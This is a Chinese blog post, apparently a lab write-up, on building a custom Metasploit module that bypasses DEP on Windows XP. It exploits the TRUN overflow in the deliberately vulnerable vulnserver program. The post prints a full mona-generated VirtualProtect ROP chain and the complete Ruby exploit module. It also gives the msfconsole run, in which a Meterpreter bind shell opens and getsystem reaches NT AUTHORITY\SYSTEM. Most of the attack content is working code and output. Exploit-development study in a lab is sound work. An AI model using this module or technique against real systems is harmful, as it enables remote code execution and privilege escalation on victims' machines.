自定义 Metasploit 模块绕过 DEP
备注:相关理论知识建议查看书籍
一、实验环境
攻击机:kali 2019-3
靶机:winXPSP3(英文版)
漏洞:vulnserver.exe(下载:https://github.com/stephenbradshaw/vulnserver)
二、启用Mona脚本
1、查找所有会被加载 .dll 文件
(1)在靶机的命令行中切换到vlunserver.exe所在的目录,执行如下命令
vlunserver.exe 9999
(2)使用ImmunityDebugger查询
- 输入命令 !mona modules 启用Mona脚本,就可以找到所有模块的信息。
- 不过为了构建ROP链,需要在这些DLL文件中找到所有可执行ROP的指令片段
2、使用 msfrop 也可查找 ROP 指令片段(穿插补充)
msfrop 命令(以msvcrt.dll为例)
msf5 > msfrop -v -s "pop cex" /root/Desktop/msvcrt.dll #使用-s参数进行查找,使用-v实现详细输出 [*] exec: msfrop -v -s "pop cex" /root/Desktop/msvcrt.dll Collecting gadgets from /root/Desktop/msvcrt.dll Found 2320 gadgets /root/Desktop/msvcrt.dll gadget: 0x77c11285 0x77c11285: add [eax], al 0x77c11287: add bl, cl 0x77c11289: dec ebp 0x77c1128a: ret /root/Desktop/msvcrt.dll gadget: 0x77c112a9 0x77c112a9: mov eax, 0f88a77c3h 0x77c112ae: ret …………
3、使用 Mona 查找并创建 ROP 链
通过使用immunity调试器中的Mona脚本,不仅可以找到ROP指令片段,还可以创建整个ROP链
使用命令 !mona rop -m *.dll -cp nonull 就可以找到所有关于ROP代码片段的信息。
新生成的 rop_chains.txt 文件中包含了可以直接用于渗透模块的完整ROP链。我们只需将这个ROP链复制到我们的渗透模块中即可。
为了创建一个可以触发VirtualProtect()函数的ROP链,对寄存器进行的设置(打开rop_chains.txt即可看到):
Register setup for VirtualProtect() : -------------------------------------------- EAX = NOP (0x90909090) ECX = lpOldProtect (ptr to W address) EDX = NewProtect (0x40) EBX = dwSize ESP = lPAddress (automatic) EBP = ReturnTo (ptr to jmp esp) ESI = ptr to VirtualProtect() EDI = ROP NOP (RETN) --- alternative chain --- EAX = ptr to &VirtualProtect() ECX = lpOldProtect (ptr to W address) EDX = NewProtect (0x40) EBX = dwSize ESP = lPAddress (automatic) EBP = POP (skip 4 bytes) ESI = ptr to JMP [EAX] EDI = ROP NOP (RETN) + place ptr to "jmp esp" on stack, below PUSHAD
创建的ROP 链:
def create_rop_chain() # rop chain generated with mona.py - www.corelan.be rop_gadgets = [ #[---INFO:gadgets_to_set_esi:---] 0x77c2d7ba, # POP ECX # RETN [msvcrt.dll] 0x6250609c, # ptr to &VirtualProtect() [IAT essfunc.dll] 0x7e41927f, # MOV EAX,DWORD PTR DS:[ECX] # RETN [USER32.dll] 0x7c94d192, # XCHG EAX,ESI # RETN [ntdll.dll] #[---INFO:gadgets_to_set_ebp:---] 0x77c42f04, # POP EBP # RETN [msvcrt.dll] 0x625011c7, # & jmp esp [essfunc.dll] #[---INFO:gadgets_to_set_ebx:---] 0x77c4e0da, # POP EAX # RETN [msvcrt.dll] 0xfffffdff, # Value to negate, will become 0x00000201 0x7e44493b, # NEG EAX # RETN [USER32.dll] 0x77f301e4, # XCHG EAX,EBX # RETN [GDI32.dll] #[---INFO:gadgets_to_set_edx:---] 0x7c87f229, # POP EAX # RETN [kernel32.dll] 0xffffffc0, # Value to negate, will become 0x00000040 0x77eda3d7, # NEG EAX # RETN [RPCRT4.dll] 0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll] #[---INFO:gadgets_to_set_ecx:---] 0x77c1f519, # POP ECX # RETN [msvcrt.dll] 0x62504d79, # &Writable location [essfunc.dll] #[---INFO:gadgets_to_set_edi:---] 0x77c46116, # POP EDI # RETN [msvcrt.dll] 0x77e8d224, # RETN (ROP NOP) [RPCRT4.dll] #[---INFO:gadgets_to_set_eax:---] 0x77ead9ed, # POP EAX # RETN [RPCRT4.dll] 0x90909090, # nop #[---INFO:pushad:---] 0x77dfc5ee, # PUSHAD # RETN [ADVAPI32.dll] ].flatten.pack("V*") return rop_gadgets end
三、编写绕过 DEP 的 Metasploit 渗透模块
1、渗透代码
class MetasploitModule <Msf::Exploit::Remote Rank=NormalRanking include Msf::Exploit::Remote::Tcp def initialize(info={}) super(update_info(info, 'Name' => 'DEP Bypass Exploit', 'Description' => %q{ DEP Bypass Using ROP Chains Example Module }, 'Platform' => 'Windows', 'Author' => ['z9m8r8'], 'Payload' => { 'space' => 312, 'BadChars' => "\x00" }, 'Targets' => [ ['Windows XP', {'Offset' => 2006}] ], 'DisclosureDate' => '2021-09-26')) register_options( [ Opt::RPORT(9999) ],self.class ) end def create_rop_chain() # rop chain generated with mona.py - www.corelan.be rop_gadgets = [ #[---INFO:gadgets_to_set_esi:---] 0x77c2d7ba, # POP ECX # RETN [msvcrt.dll] 0x6250609c, # ptr to &VirtualProtect() [IAT essfunc.dll] 0x7e41927f, # MOV EAX,DWORD PTR DS:[ECX] # RETN [USER32.dll] 0x7c94d192, # XCHG EAX,ESI # RETN [ntdll.dll] #[---INFO:gadgets_to_set_ebp:---] 0x77c42f04, # POP EBP # RETN [msvcrt.dll] 0x625011c7, # & jmp esp [essfunc.dll] #[---INFO:gadgets_to_set_ebx:---] 0x77c4e0da, # POP EAX # RETN [msvcrt.dll] 0xfffffdff, # Value to negate, will become 0x00000201 0x7e44493b, # NEG EAX # RETN [USER32.dll] 0x77f301e4, # XCHG EAX,EBX # RETN [GDI32.dll] #[---INFO:gadgets_to_set_edx:---] 0x7c87f229, # POP EAX # RETN [kernel32.dll] 0xffffffc0, # Value to negate, will become 0x00000040 0x77eda3d7, # NEG EAX # RETN [RPCRT4.dll] 0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll] #[---INFO:gadgets_to_set_ecx:---] 0x77c1f519, # POP ECX # RETN [msvcrt.dll] 0x62504d79, # &Writable location [essfunc.dll] #[---INFO:gadgets_to_set_edi:---] 0x77c46116, # POP EDI # RETN [msvcrt.dll] 0x77e8d224, # RETN (ROP NOP) [RPCRT4.dll] #[---INFO:gadgets_to_set_eax:---] 0x77ead9ed, # POP EAX # RETN [RPCRT4.dll] 0x90909090, # nop #[---INFO:pushad:---] 0x77dfc5ee, # PUSHAD # RETN [ADVAPI32.dll] ].flatten.pack("V*") return rop_gadgets end def exploit connect rop_chain=create_rop_chain() junk=rand_text_alpha_upper(target['Offset']) buf="TRUN ."+junk+rop_chain+make_nops(16)+payload.encoded+'\r\n' sock.put(buf) handler disconnect end end
2、保存路径
root@kali:/usr/share/metasploit-framework/modules/exploits/windows/z9m8r8_test# ls dep_attack_by_z9m8r8.rb seh_attack_by_z9m8r8.rb
3、简要解析
exploit函数
- 从rop_chains.txt文件中将Mona脚本产生的create_rop_chain函数复制到渗透代码中
- 调用create_rop_chain函数,并将完整的ROP链保存到rop_chain变量中
- 使用rand_text_alpha_upper函数创建了一个包含了2006个随机字符的字符串,并将其保存在一个名为junk的变量中
- 将命令TRUN与包含了2006个随机字符的junk变量和rop_chain保存在buf变量中
- 再将一些填充数据和ShellCode添加到buf变量中
4、代码调试
root@kali:/usr/share/metasploit-framework/modules/exploits/windows/z9m8r8_test# ../../../../tools/dev/msftidy.rb dep_attack_by_z9m8r8.rb dep_attack_by_z9m8r8.rb - [INFO] No CVE references found. Please check before you land! dep_attack_by_z9m8r8.rb - [ERROR] Unable to determine super class #未解决(super()看了好几遍没发现有什么问题),但msf中依旧可渗透成功! dep_attack_by_z9m8r8.rb:19 - [WARNING] Spaces at EOL
四、msf 运行测试
msf5 > use exploit/windows/z9m8r8_test/dep_attack_by_z9m8r8 msf5 exploit(windows/z9m8r8_test/dep_attack_by_z9m8r8) > set payload windows/meterpreter/bind_tcp payload => windows/meterpreter/bind_tcp msf5 exploit(windows/z9m8r8_test/dep_attack_by_z9m8r8) > show options Module options (exploit/windows/z9m8r8_test/dep_attack_by_z9m8r8): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target address range or CIDR identifier RPORT 9999 yes The target port (TCP) Payload options (windows/meterpreter/bind_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LPORT 4444 yes The listen port RHOST no The target address Exploit target: Id Name -- ---- 0 Windows XP msf5 exploit(windows/z9m8r8_test/dep_attack_by_z9m8r8) > set rhost 10.10.10.131 rhost => 10.10.10.131 msf5 exploit(windows/z9m8r8_test/dep_attack_by_z9m8r8) > exploit [*] Started bind TCP handler against 10.10.10.131:4444 [*] Sending stage (179779 bytes) to 10.10.10.131 [*] Meterpreter session 1 opened (10.10.10.149:40241 -> 10.10.10.131:4444) at 2021-09-26 07:06:01 -0400 meterpreter > getuid Server username: DH-CA8822AB9589\Administrator meterpreter > getsystem ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter >
五、参考文献
《精通Metasploit渗透测试》
不忘初心,方得始终。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· Linux系列:如何用 C#调用 C方法造成内存泄露
· AI与.NET技术实操系列(二):开始使用ML.NET
· 记一次.NET内存居高不下排查解决与启示
· 探究高空视频全景AR技术的实现原理
· 理解Rust引用及其生命周期标识(上)
· DeepSeek 开源周回顾「GitHub 热点速览」
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· .NET 10首个预览版发布:重大改进与新特性概览!
· AI与.NET技术实操系列(二):开始使用ML.NET
· 单线程的Redis速度为什么快?